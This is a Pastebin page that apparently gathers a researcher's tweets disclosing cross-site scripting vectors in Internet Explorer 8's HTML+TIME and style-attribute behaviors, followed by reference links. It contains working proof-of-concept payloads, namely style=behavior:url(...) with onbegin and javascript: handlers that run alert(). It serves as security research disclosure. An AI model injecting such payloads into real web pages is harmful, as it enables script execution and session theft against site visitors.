Advertisement
Guest User

mario

a guest
Dec 30th, 2009
2,418
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.90 KB | None | 0 0
  1. 1. https://twitter.com/0x6D6172696F/status/7180793115:
  2. Ever heard about IE's HTML+TIME? http://is.gd/5G60U - enabling vectors like this: 1<x/style=`behavior:url(#default#time2)`onbegin=alert(2)>
  3.  
  4. 2. https://twitter.com/0x6D6172696F/status/7196312532:
  5. More HTML+TIME - changing link targets: http://pastebin.com/f521ea4e6
  6.  
  7. 3. https://twitter.com/0x6D6172696F/status/7196350903:
  8. XSS via style attribute - it's back :) <a style=behavior:url(#default#anchorclick) folder=javascript:alert(1) href=http://good.com>IE8</a>
  9.  
  10. 4. https://twitter.com/0x6D6172696F/status/7197250108:
  11. Just to have this little rascal persisted - self-executing XSS with ALL HTML elements on IE8 http://pastebin.com/f3712ff6a
  12.  
  13. More info on HTML+TIME:
  14. * http://msdn.microsoft.com/de-de/library/ms533099%28en-us,VS.85%29.aspx
  15. * http://msdn.microsoft.com/de-de/library/ms533102%28en-us,VS.85%29.aspx
  16. * http://www.w3.org/TR/NOTE-HTMLplusTIME
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement